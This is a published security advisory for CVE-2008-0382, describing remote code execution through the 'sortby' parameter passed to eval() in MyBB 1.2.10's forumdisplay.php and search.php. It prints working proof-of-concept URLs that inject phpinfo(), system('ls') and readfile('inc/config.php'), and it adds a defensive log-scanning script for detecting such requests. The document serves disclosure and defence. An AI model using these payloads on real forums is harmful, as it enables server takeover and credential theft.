Details : SecurityAlert

  Topic : Remote Code Execution in MyBB 1.2.10
  SecurityAlert : 3559
  CVE : CVE-2008-0382
  SecurityRisk : High
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : waraxe
  Published : 22.01.2008

  Affected Software : MyBB 1.2.10



  Advisory Text :  


[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10

===============================================================================

Author: Janek Vind "waraxe"

Independent discovery: koziolek

Date: 16. January 2008

Location: Estonia, Tartu

Web: http://www.waraxe.us/advisory-61.html

Target software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MyBB is a discussion board that has been around for a while; it has evolved from other bulletin boards into the forum package it is today. Therefore, it is a professional and efficient discussion board, developed by an active team of developers.

Vulnerabilities discovered

===============================================================================

1. Remote Code Execution in "forumdisplay.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: a valid forum "fid" must be known.

The attacker does not need any privileges in the MyBB installation for the attack to succeed.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see an error message:

Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1

The problematic piece of code is related to the "eval()" function, which builds PHP source from the unfiltered "sortby" request parameter:

eval("\$orderarrow['$sortby'] = \"".$templates->get("forumdisplay_orderarrow")."\";");

Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//

2. Remote Code Execution in "search.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: a search "sid" must be known, but that's a trivial task.

The attacker does not need any privileges in the MyBB installation for the attack to succeed.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='

Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1

The problematic code is exactly the same as in the previous case:

eval("\$orderarrow['$sortby'] = \"".$templates->get("forumdisplay_orderarrow")."\";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be used by an attacker for a complete takeover of the website and a possible total compromise of the webserver.

How to fix:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Download the new MyBB version 1.2.11 as soon as possible!
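For boards that ran 1.2.10 before upgrading, the following added example (not part of the original advisory or of MyBB) reviews web server access logs for "sortby" values sent to the two affected scripts that are not plain sort keys. It assumes combined-format log lines and that legitimate sort keys are short lowercase identifiers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory as passing "sortby" into eval().
ENDPOINTS = ("/forumdisplay.php", "/search.php")
# Assumption: legitimate sort keys are short lowercase identifiers.
SAFE_SORTBY = re.compile(r"[a-z_]{1,32}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_sortby(log_line):
    """Return the decoded sortby value if the line needs review, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith(ENDPOINTS):
        return None
    # parse_qs percent-decodes, so %27%5D and '] are treated alike.
    for value in parse_qs(url.query).get("sortby", []):
        if not SAFE_SORTBY.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, client, sortby) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_sortby(line)
        if value is not None:
            hits.append((number, line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2008:10:00:01 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=lastpost HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Jan/2008:10:00:07 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=%27 HTTP/1.1" 200 311',
    '192.0.2.44 - - [22/Jan/2008:10:00:09 +0000] "GET /mybb/search.php?action=results&sid=abc&sortby=%27%5D%3Bphpinfo()%3Bexit%3B%2F%2F HTTP/1.1" 200 48211',
    '192.0.2.10 - - [22/Jan/2008:10:00:12 +0000] "GET /mybb/showthread.php?tid=5&sortby=%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that a request was made; whether it executed depends on the MyBB version that was running when the request arrived.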

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and anyone else who knows me!

Greetings to Raido Kerna. Greetings to the people of Torufoorum!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

Homepage: http://www.janekvind.com/

Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ] ------------------------------------




